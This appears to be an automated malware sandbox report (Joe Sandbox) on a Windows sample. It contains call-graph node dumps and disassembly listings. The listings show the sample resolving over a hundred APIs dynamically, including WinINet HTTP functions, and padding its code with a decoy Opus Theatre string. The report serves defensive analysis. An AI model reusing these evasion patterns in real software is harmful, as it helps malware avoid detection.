108969 61e593bd free malloc strcmp GetSystemInfo 108984 61e75fe4 108969->108984 108971 61e1a7b6 free malloc 108971->108984 108972 61e1ad86 free malloc 108972->108984 108973 61e1aaa4 free malloc 108973->108984 108975 61e767d1 108978 61e0aee0 free 108975->108978 108976 61e1cc77 free malloc 108982 61e762e8 108976->108982 108977 61e2086f free malloc 108977->108982 108978->108964 108982->108960 108982->108964 108982->108976 108982->108977 108983 61e24fdf free malloc 108982->108983 109002 61e20759 free malloc 108982->109002 109003 61e1ad86 free malloc 108982->109003 109004 61e1a7b6 free malloc 108982->109004 109005 61e27289 free malloc 108982->109005 109006 61e24de7 free malloc 108982->109006 108983->108982 108984->108959 108984->108964 108984->108965 108984->108969 108984->108971 108984->108972 108984->108973 108984->108975 108984->108982 108985 61e769f5 108984->108985 108987 61e0cb60 27 API calls 108984->108987 108993 61e75edb 108984->108993 109000 61e6b5bb 27 API calls 108984->109000 109001 61e24a13 free malloc 108984->109001 109008 61e1aec6 free malloc 108984->109008 109009 61e1a7b6 free malloc 108985->109009 108987->108984 108989 61e1af54 108988->108989 108990 61e1af18 108988->108990 108989->108984 108992 61e1af33 108990->108992 109010 61e1aec6 free malloc 108990->109010 108992->108984 108994 61e75ef1 108993->108994 109011 61e75c77 108994->109011 108996 61e75f17 108996->108984 108997->108955 108998->108964 108999->108964 109000->108984 109001->108984 109002->108982 109003->108982 109004->108982 109005->108982 109006->108982 109007->108964 109008->108984 109009->108964 109010->108992 109012 61e75ca7 109011->109012 109019 61e75c90 109011->109019 109041 61e757ae 109012->109041 109014 61e75da8 109015 61e75eb6 109014->109015 109016 61e75e90 109014->109016 109020 61e75cb0 109014->109020 109054 61e1a7b6 free malloc 109015->109054 109053 61e1a7b6 free malloc 109016->109053 109019->109014 109019->109020 109045 61e1aaa4 free malloc 109019->109045 109020->108996 109022 61e75d7e 109022->109014 109046 61e1ad86 free malloc 109022->109046 109024 61e75d93 109025 61e75dad 109024->109025 109026 61e75d99 109024->109026 109047 61e1ad86 free malloc 109025->109047 109027 61e0aee0 free 109026->109027 109027->109014 109029 61e75ddd 109048 61e24945 free malloc 109029->109048 109031 61e75de8 109049 61e24945 free malloc 109031->109049 109033 61e75df3 109050 61e1ad86 free malloc 109033->109050 109035 61e75dfd 109051 61e24945 free malloc 109035->109051 109037 61e75e08 109037->109020 109052 61e1a7b6 free malloc 109037->109052 109039 61e75e3f 109040 61e0aee0 free 109039->109040 109040->109020 109042 61e757c2 109041->109042 109044 61e757be 109041->109044 109055 61e7571b 109042->109055 109044->109019 109045->109022 109046->109024 109047->109029 109048->109031 109049->109033 109050->109035 109051->109037 109052->109039 109053->109020 109054->109020 109056 61e75751 109055->109056 109058 61e75744 109055->109058 109061 61e753be 109056->109061 109059 61e753be 27 API calls 109058->109059 109060 61e75768 109058->109060 109059->109058 109060->109044 109086 61e885c9 109061->109086 109063 61e75485 109063->109058 109064 61e7545e 109064->109063 109074 61e754da 109064->109074 109075 61e754d2 109064->109075 109105 61e4c7c5 109064->109105 109065 61e756df 109159 61e16f42 free 109065->109159 109069 61e754b4 109070 61e754c1 109069->109070 109069->109074 109153 61e1ae16 free malloc 109070->109153 109072 61e755ad 109154 61e1ae16 free malloc 109072->109154 109074->109072 109076 61e755c6 109074->109076 109075->109063 109075->109065 109158 61e1a839 free malloc 109075->109158 109120 61e75015 109076->109120 109079 61e75647 109080 61e0aee0 free 109079->109080 109081 61e75667 109080->109081 109082 61e75675 109081->109082 109155 61e752d9 free memmove strcmp malloc 109081->109155 109083 61e755c1 109082->109083 109156 61e16f9b free 109082->109156 109083->109063 109083->109075 109157 61e52f4f 14 API calls 109083->109157 109087 61e885e9 109086->109087 109088 61e885fd 109086->109088 109089 61e885f2 109087->109089 109091 61e88607 109087->109091 109088->109064 109160 61e2ae36 free malloc 109089->109160 109093 61e88640 109091->109093 109097 61e8860d 109091->109097 109096 61e88687 109093->109096 109161 61e2ae36 free malloc 109093->109161 109095 61e886f3 109165 61e5655a 14 API calls 109095->109165 109096->109095 109099 61e886ec 109096->109099 109100 61e886f5 109096->109100 109097->109088 109166 61e2ae36 free malloc 109097->109166 109162 61e1a839 free malloc 109099->109162 109100->109095 109163 61e2d35e free malloc 109100->109163 109103 61e88706 109164 61e2ae36 free malloc 109103->109164 109118 61e4c7e7 109105->109118 109107 61e4ccf1 109107->109069 109109 61e032bd 13 API calls 109109->109118 109110 61e4ccf6 109110->109107 109194 61e14bcf free malloc 109110->109194 109111 61e4c907 memcmp 109111->109118 109112 61e4c95d memcmp 109112->109118 109113 61e4cc08 memcmp 109113->109118 109114 61e4c9d9 memcmp 109114->109118 109118->109107 109118->109109 109118->109110 109118->109111 109118->109112 109118->109113 109118->109114 109119 61e15e54 2 API calls 109118->109119 109167 61e4b8a1 109118->109167 109191 61eb24c5 9 API calls 109118->109191 109192 61e0c919 free 109118->109192 109193 61e2a72e free malloc 109118->109193 109119->109118 109195 61e2d258 109120->109195 109123 61e75036 109201 61e2c708 free malloc 109123->109201 109124 61e75045 109127 61e0c05c free 109124->109127 109126 61e75040 109126->109079 109139 61e75063 109127->109139 109128 61e75266 109130 61e0aee0 free 109128->109130 109131 61e75272 109130->109131 109132 61e11243 free 109131->109132 109134 61e7527c 109132->109134 109133 61e7485a 4 API calls 109133->109139 109134->109126 109208 61e2d35e free malloc 109134->109208 109136 61e75290 109209 61e1ad86 free malloc 109136->109209 109139->109133 109141 61e1a985 2 API calls 109139->109141 109143 61e0aee0 free 109139->109143 109145 61e751e3 109139->109145 109149 61e751a1 109139->109149 109152 61e751a8 109139->109152 109202 61e1f9e1 free 109139->109202 109203 61e11954 free 109139->109203 109206 61e56534 free memmove malloc 109139->109206 109140 61e75299 109140->109126 109144 61e0c05c free 109140->109144 109141->109139 109143->109139 109144->109126 109205 61e56534 free memmove malloc 109145->109205 109148 61e751eb 109151 61e0c05c free 109148->109151 109204 61e1a839 free malloc 109149->109204 109151->109152 109152->109128 109207 61e56534 free memmove malloc 109152->109207 109153->109075 109154->109083 109155->109082 109156->109083 109157->109075 109158->109065 109159->109063 109160->109088 109161->109096 109162->109095 109163->109103 109164->109095 109165->109088 109166->109088 109168 61e4bc0c 109167->109168 109171 61e4b8b9 109167->109171 109169 61e4bb3d 109168->109169 109170 61e3720a 11 API calls 109168->109170 109169->109118 109170->109168 109171->109169 109172 61e4b9c4 109171->109172 109180 61e0161e 8 API calls 109171->109180 109184 61e4b976 109171->109184 109186 61e4b8df 109171->109186 109172->109169 109173 61e014e3 free malloc ReadFile 109172->109173 109179 61e4bbaf 109172->109179 109174 61e4bb76 109173->109174 109174->109169 109175 61e4bb91 memcmp 109174->109175 109175->109179 109176 61e4bafa 109176->109169 109176->109172 109177 61e4abf5 13 API calls 109176->109177 109177->109172 109178 61e0161e 8 API calls 109182 61e4bada 109178->109182 109179->109168 109181 61eb24c5 9 API calls 109179->109181 109180->109184 109181->109168 109182->109176 109187 61e2a6f9 free malloc 109182->109187 109183 61e014e3 free malloc ReadFile 109185 61e4b99d 109183->109185 109184->109172 109184->109183 109184->109186 109185->109186 109188 61e014c2 CloseHandle 109185->109188 109186->109169 109186->109172 109186->109176 109186->109178 109189 61e4baf0 109187->109189 109188->109186 109190 61e014c2 CloseHandle 109189->109190 109190->109176 109191->109118 109192->109118 109193->109118 109194->109107 109196 61e2d26c 109195->109196 109197 61e2d262 109195->109197 109198 61e2d29e 109196->109198 109199 61e2d217 free malloc 109196->109199 109197->109198 109200 61e2a4ce free malloc 109197->109200 109198->109123 109198->109124 109199->109197 109200->109198 109201->109126 109202->109139 109203->109139 109204->109152 109205->109148 109206->109139 109207->109128 109208->109136 109209->109140 109210 61e16b04 109213 61e16b14 109210->109213 109211 61e16b4e 109212 61e16bcb 109211->109212 109225 61e16b55 109211->109225 109214 61e16c1e 109212->109214 109220 61e16bcf 109212->109220 109213->109211 109245 61e14718 free malloc 109213->109245 109246 61e16889 free 109213->109246 109248 61e16404 free 109214->109248 109217 61e16c1c 109237 61e165fe 109217->109237 109220->109217 109223 61e16c0d 109220->109223 109229 61e0aee0 free 109220->109229 109222 61e0aee0 free 109224 61e16c44 109222->109224 109226 61e0aee0 free 109223->109226 109227 61e0aee0 free 109224->109227 109225->109217 109230 61e16aa0 free 109225->109230 109233 61e0aee0 free 109225->109233 109247 61e14718 free malloc 109225->109247 109226->109217 109231 61e16c53 109227->109231 109229->109220 109230->109225 109249 61e165a3 free 109231->109249 109233->109225 109234 61e16c62 109235 61e0aee0 free 109234->109235 109236 61e16c6e 109235->109236 109238 61e16609 109237->109238 109243 61e16661 109237->109243 109239 61e1663d 109238->109239 109240 61e0aee0 free 109238->109240 109241 61e0aee0 free 109239->109241 109240->109238 109242 61e1664c 109241->109242 109242->109243 109250 61e165a3 free 109242->109250 109243->109222 109245->109213 109246->109213 109247->109225 109248->109217 109249->109234 109250->109243 109251 61e2b80f 109252 61e2b816 109251->109252 109253 61e2b846 109252->109253 109255 61e2b771 109252->109255 109256 61e2b779 109255->109256 109259 61e2b6b7 109256->109259 109258 61e2b7cb 109258->109252 109260 61e2b6db 109259->109260 109261 61e2b6cd 109259->109261 109267 61e02a84 109260->109267 109270 61e2a72e free malloc 109261->109270 109264 61e2b6f0 109266 61e2b6d7 109264->109266 109271 61e2a72e free malloc 109264->109271 109266->109258 109272 61e4b216 109267->109272 109268 61e02aa3 109268->109264 109270->109266 109271->109266 109277 61e4b235 109272->109277 109273 61e4b33c 109281 61e4b31f 109273->109281 109299 61e4b1d2 13 API calls 109273->109299 109275 61e4b332 109296 61e2a72e free malloc 109275->109296 109276 61e4b343 109279 61e4b359 109276->109279 109280 61e4b398 109276->109280 109277->109273 109277->109275 109277->109276 109277->109281 109279->109273 109283 61e4b361 109279->109283 109287 61e2c4e6 109280->109287 109281->109268 109283->109281 109284 61e4b379 109283->109284 109297 61e14f21 free malloc 109283->109297 109298 61e1506d free malloc 109284->109298 109288 61e2c573 109287->109288 109289 61e2c505 109287->109289 109300 61e2c406 free malloc 109288->109300 109290 61e2c586 109289->109290 109291 61e2c50f 109289->109291 109295 61e2c571 109289->109295 109293 61e014e3 3 API calls 109290->109293 109294 61e014e3 3 API calls 109291->109294 109293->109295 109294->109295 109295->109273 109296->109273 109297->109284 109298->109281 109300->109289 109301 61e84a87 109302 61e84a9e 109301->109302 109307 61e84b2e 109301->109307 109317 61e2a0e4 free memmove malloc 109302->109317 109304 61e84ac1 109305 61e11243 free 109304->109305 109306 61e84acd 109305->109306 109306->109307 109308 61e84d5a 109306->109308 109312 61e84b97 109307->109312 109318 61e1b434 free malloc 109307->109318 109322 61e16690 free 109308->109322 109311 61e84d65 109313 61e4c7c5 24 API calls 109312->109313 109319 61e1a839 free malloc 109312->109319 109320 61e16f42 free 109312->109320 109321 61e52f4f 14 API calls 109312->109321 109313->109312 109317->109304 109318->109312 109319->109312 109320->109312 109321->109312 109322->109311

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 633 419f20-419f2a 634 419f30-41a341 GetProcAddress * 43 633->634 635 41a346-41a3da LoadLibraryA * 8 633->635 634->635 636 41a456-41a45d 635->636 637 41a3dc-41a451 GetProcAddress * 5 635->637 638 41a463-41a521 GetProcAddress * 8 636->638 639 41a526-41a52d 636->639 637->636 638->639 640 41a5a8-41a5af 639->640 641 41a52f-41a5a3 GetProcAddress * 5 639->641 642 41a5b5-41a642 GetProcAddress * 6 640->642 643 41a647-41a64e 640->643 641->640 642->643 644 41a654-41a72a GetProcAddress * 9 643->644 645 41a72f-41a736 643->645 644->645 646 41a7b2-41a7b9 645->646 647 41a738-41a7ad GetProcAddress * 5 645->647 648 41a7bb-41a7e7 GetProcAddress * 2 646->648 649 41a7ec-41a7f3 646->649 647->646 648->649 650 41a825-41a82c 649->650 651 41a7f5-41a820 GetProcAddress * 2 649->651 652 41a922-41a929 650->652 653 41a832-41a91d GetProcAddress * 10 650->653 651->650 654 41a92b-41a988 GetProcAddress * 4 652->654 655 41a98d-41a994 652->655 653->652 654->655 656 41a996-41a9a9 GetProcAddress 655->656 657 41a9ae-41a9b5 655->657 656->657 658 41a9b7-41aa13 GetProcAddress * 4 657->658 659 41aa18-41aa19 657->659 658->659
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966770), ref: 00419F3D
                                                                                                • GetProcAddress.KERNEL32(74DD0000,009667D0), ref: 00419F55
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971E80), ref: 00419F6E
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971E98), ref: 00419F86
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971F40), ref: 00419F9E
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971E68), ref: 00419FB7
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096E988), ref: 00419FCF
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971D48), ref: 00419FE7
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971E50), ref: 0041A000
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971CE8), ref: 0041A018
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971D18), ref: 0041A030
                                                                                                • GetProcAddress.KERNEL32(74DD0000,009668B0), ref: 0041A049
                                                                                                • GetProcAddress.KERNEL32(74DD0000,009667F0), ref: 0041A061
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966870), ref: 0041A079
                                                                                                • GetProcAddress.KERNEL32(74DD0000,009668F0), ref: 0041A092
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971F28), ref: 0041A0AA
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971F58), ref: 0041A0C2
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096E9D8), ref: 0041A0DB
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966590), ref: 0041A0F3
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971D30), ref: 0041A10B
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971D60), ref: 0041A124
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971F88), ref: 0041A13C
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971EB0), ref: 0041A154
                                                                                                • GetProcAddress.KERNEL32(74DD0000,009665B0), ref: 0041A16D
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971D90), ref: 0041A185
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971FB8), ref: 0041A19D
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971D00), ref: 0041A1B6
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971CD0), ref: 0041A1CE
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971DA8), ref: 0041A1E6
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971EC8), ref: 0041A1FF
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971DC0), ref: 0041A217
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971EE0), ref: 0041A22F
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971FA0), ref: 0041A248
                                                                                                • GetProcAddress.KERNEL32(74DD0000,0096E0A8), ref: 0041A260
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971DD8), ref: 0041A278
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971F70), ref: 0041A291
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966A10), ref: 0041A2A9
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971DF0), ref: 0041A2C1
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966C50), ref: 0041A2DA
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971E08), ref: 0041A2F2
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00971F10), ref: 0041A30A
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966990), ref: 0041A323
                                                                                                • GetProcAddress.KERNEL32(74DD0000,00966A90), ref: 0041A33B
                                                                                                • LoadLibraryA.KERNEL32(00971E20,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
                                                                                                • LoadLibraryA.KERNEL32(00971E38,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
                                                                                                • LoadLibraryA.KERNEL32(00971FE8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
                                                                                                • LoadLibraryA.KERNEL32(00972048,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
                                                                                                • LoadLibraryA.KERNEL32(00972060,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
                                                                                                • LoadLibraryA.KERNEL32(00972030,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
                                                                                                • LoadLibraryA.KERNEL32(00972078,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
                                                                                                • LoadLibraryA.KERNEL32(00972090,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
                                                                                                • GetProcAddress.KERNEL32(75290000,00966D30), ref: 0041A3EA
                                                                                                • GetProcAddress.KERNEL32(75290000,00972018), ref: 0041A402
                                                                                                • GetProcAddress.KERNEL32(75290000,0096C1B8), ref: 0041A41A
                                                                                                • GetProcAddress.KERNEL32(75290000,00971FD0), ref: 0041A433
                                                                                                • GetProcAddress.KERNEL32(75290000,00966BB0), ref: 0041A44B
                                                                                                • GetProcAddress.KERNEL32(73B50000,0096EDE8), ref: 0041A470
                                                                                                • GetProcAddress.KERNEL32(73B50000,00966A50), ref: 0041A489
                                                                                                • GetProcAddress.KERNEL32(73B50000,0096EAF0), ref: 0041A4A1
                                                                                                • GetProcAddress.KERNEL32(73B50000,00972000), ref: 0041A4B9
                                                                                                • GetProcAddress.KERNEL32(73B50000,0096CC18), ref: 0041A4D2
                                                                                                • GetProcAddress.KERNEL32(73B50000,009669B0), ref: 0041A4EA
                                                                                                • GetProcAddress.KERNEL32(73B50000,00966CF0), ref: 0041A502
                                                                                                • GetProcAddress.KERNEL32(73B50000,00973B10), ref: 0041A51B
                                                                                                • GetProcAddress.KERNEL32(752C0000,009669D0), ref: 0041A53C
                                                                                                • GetProcAddress.KERNEL32(752C0000,00966D10), ref: 0041A554
                                                                                                • GetProcAddress.KERNEL32(752C0000,00973D08), ref: 0041A56D
                                                                                                • GetProcAddress.KERNEL32(752C0000,00973BD0), ref: 0041A585
                                                                                                • GetProcAddress.KERNEL32(752C0000,00966AF0), ref: 0041A59D
                                                                                                • GetProcAddress.KERNEL32(74EC0000,0096EBB8), ref: 0041A5C3
                                                                                                • GetProcAddress.KERNEL32(74EC0000,0096EA00), ref: 0041A5DB
                                                                                                • GetProcAddress.KERNEL32(74EC0000,00973DB0), ref: 0041A5F3
                                                                                                • GetProcAddress.KERNEL32(74EC0000,00966BD0), ref: 0041A60C
                                                                                                • GetProcAddress.KERNEL32(74EC0000,00966C10), ref: 0041A624
                                                                                                • GetProcAddress.KERNEL32(74EC0000,0096EE10), ref: 0041A63C
                                                                                                • GetProcAddress.KERNEL32(75BD0000,00973B58), ref: 0041A662
                                                                                                • GetProcAddress.KERNEL32(75BD0000,00966C70), ref: 0041A67A
                                                                                                • GetProcAddress.KERNEL32(75BD0000,0096C328), ref: 0041A692
                                                                                                • GetProcAddress.KERNEL32(75BD0000,00973D20), ref: 0041A6AB
                                                                                                • GetProcAddress.KERNEL32(75BD0000,00973DE0), ref: 0041A6C3
                                                                                                • GetProcAddress.KERNEL32(75BD0000,00966B50), ref: 0041A6DB
                                                                                                • GetProcAddress.KERNEL32(75BD0000,00966AB0), ref: 0041A6F4
                                                                                                • GetProcAddress.KERNEL32(75BD0000,00973CA8), ref: 0041A70C
                                                                                                • GetProcAddress.KERNEL32(75BD0000,00973D80), ref: 0041A724
                                                                                                • GetProcAddress.KERNEL32(75A70000,00966B90), ref: 0041A746
                                                                                                • GetProcAddress.KERNEL32(75A70000,00973B28), ref: 0041A75E
                                                                                                • GetProcAddress.KERNEL32(75A70000,00973D50), ref: 0041A776
                                                                                                • GetProcAddress.KERNEL32(75A70000,00973D98), ref: 0041A78F
                                                                                                • GetProcAddress.KERNEL32(75A70000,00973C90), ref: 0041A7A7
                                                                                                • GetProcAddress.KERNEL32(75450000,00966CB0), ref: 0041A7C8
                                                                                                • GetProcAddress.KERNEL32(75450000,00966BF0), ref: 0041A7E1
                                                                                                • GetProcAddress.KERNEL32(75DA0000,00966B30), ref: 0041A802
                                                                                                • GetProcAddress.KERNEL32(75DA0000,00973B40), ref: 0041A81A
                                                                                                • GetProcAddress.KERNEL32(6F070000,00966C30), ref: 0041A840
                                                                                                • GetProcAddress.KERNEL32(6F070000,00966B10), ref: 0041A858
                                                                                                • GetProcAddress.KERNEL32(6F070000,00966C90), ref: 0041A870
                                                                                                • GetProcAddress.KERNEL32(6F070000,00973C18), ref: 0041A889
                                                                                                • GetProcAddress.KERNEL32(6F070000,00966CD0), ref: 0041A8A1
                                                                                                • GetProcAddress.KERNEL32(6F070000,00966B70), ref: 0041A8B9
                                                                                                • GetProcAddress.KERNEL32(6F070000,009669F0), ref: 0041A8D2
                                                                                                • GetProcAddress.KERNEL32(6F070000,00966A30), ref: 0041A8EA
                                                                                                • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A901
                                                                                                • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A917
                                                                                                • GetProcAddress.KERNEL32(75AF0000,00973CC0), ref: 0041A939
                                                                                                • GetProcAddress.KERNEL32(75AF0000,0096C378), ref: 0041A951
                                                                                                • GetProcAddress.KERNEL32(75AF0000,00973C78), ref: 0041A969
                                                                                                • GetProcAddress.KERNEL32(75AF0000,00973DC8), ref: 0041A982
                                                                                                • GetProcAddress.KERNEL32(75D90000,00966A70), ref: 0041A9A3
                                                                                                • GetProcAddress.KERNEL32(6FA80000,00973B70), ref: 0041A9C4
                                                                                                • GetProcAddress.KERNEL32(6FA80000,00966AD0), ref: 0041A9DD
                                                                                                • GetProcAddress.KERNEL32(6FA80000,00973B88), ref: 0041A9F5
                                                                                                • GetProcAddress.KERNEL32(6FA80000,00973BA0), ref: 0041AA0D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                • API String ID: 2238633743-1775429166
                                                                                                • Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                                                                                • Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
                                                                                                • Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                                                                                • Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                                                                                • strlen.MSVCRT ref: 00404740
                                                                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
